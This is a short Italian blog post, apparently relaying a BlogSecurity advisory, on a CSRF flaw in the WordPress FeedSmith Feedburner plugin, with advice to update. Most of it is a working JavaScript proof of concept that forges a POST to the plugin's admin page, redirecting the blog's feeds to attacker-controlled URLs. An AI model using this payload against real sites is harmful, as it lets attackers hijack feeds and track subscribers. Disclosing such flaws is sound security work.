Feedsmith Feedburner, famoso plugin di wordpress è vulnerabile ad attacchi del tipo CSRF che potrebbero consentire ad un aggressore di dirottare i feed dei vostri blog.

La pagina del popolare plugin dice questo:

Questo plugin dirotta il 100% del traffico dei vostri feed sul feed di Feedburner che avete creato sul servizio. FeedBurner può tracciare tutto il traffico dei vostri feed e l’uso che ne viene fatto per poi applicarci una varietà di features che sceglierete per migliorare i vostri feeds su Wordpress.

In altre parole, se un attacker può contrallare il vostro Feedburner plugin, significa che al 100% può controllare il traffico del vostro feed e dirottarlo (hijack)….Potrebbero,inoltre, essere tracciati tutti i sottoscrittori, il traffico, l’uso…

POC

// Simple Proof of Concept Exploit for FeedSmith Feedburner CSRF Hijacking
// Tested on version 2.2.

t='http://the-target/wordpress/wp-admin/options-general.php?
page=FeedBurner_FeedSmith_Plugin.php';

p='redirect=true&feedburner_url=
http://hijacking-your-feed.com/with/new/feed&
feedburner_comments_url=http://hijacking-your-comments.com/with/new/feed';

feedburner_csrf = function(t, p) {

req = new XMLHttpRequest();
var url = t;
var params = p;
req.open("POST", url);
req.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
req.setRequestHeader("Content-length", params.length);
req.setRequestHeader("Connection", "close");
req.send(params);
};
feedburner_csrf(t,p);

Soluzione:

Scaricare il plugin aggiornato.

Via BlogSecurity